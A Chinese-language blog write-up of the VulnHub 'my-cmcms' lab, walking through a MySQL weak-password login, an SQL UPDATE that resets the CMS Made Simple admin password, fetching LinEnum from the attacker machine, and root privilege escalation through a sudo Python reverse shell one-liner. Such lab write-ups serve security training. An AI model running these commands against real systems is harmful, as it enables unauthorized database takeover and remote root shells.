my-cmcms-vulnhub渗透测试

前言

my-cmcms-vulnhub渗透测试

考点:

​ mysql弱密码

​ LinEnum辅助提权工具使用

​ cms made simple 修改密码

靶机IP:192.168.1.168

KaLi:192.168.1.76

渗透过程

nmap扫描

image-20200715155132670

在扫出的80端口,扫目录等到后台的路径/admin

但是除此之外,再无可用信息。

访问3306端口,弱口令root:root

1
2
mysql -u root -h 192.168.1.168 -p
root

image-20200715160329725

但是admin的密码,我们无法破解,百度cms made simple忘记密码怎么办

1
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'cookie'))) where username = 'admin'

这样就可以修改admin密码

登陆后台

msfvenon生成shell

image-20200715160621080

msf反弹shell

image-20200715160818431

image-20200715160858344

上传LinEnum.sh

1
2
3
wget http://192.168.1.76/LinEnmu
chmod -R 777 LinEnum.sh
./LinEnum.sh

image-20200715161112620

发现这个

image-20200715161318964

解密后得到armour的密码

1
su armour

image-20200715161416740

可以使用python提权

1
sudo -u root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.76",6665));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

image-20200715161618306

提权成功

Author: 我是小吴啦
Link: http://yoursite.com/2020/07/15/my-cmcms-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.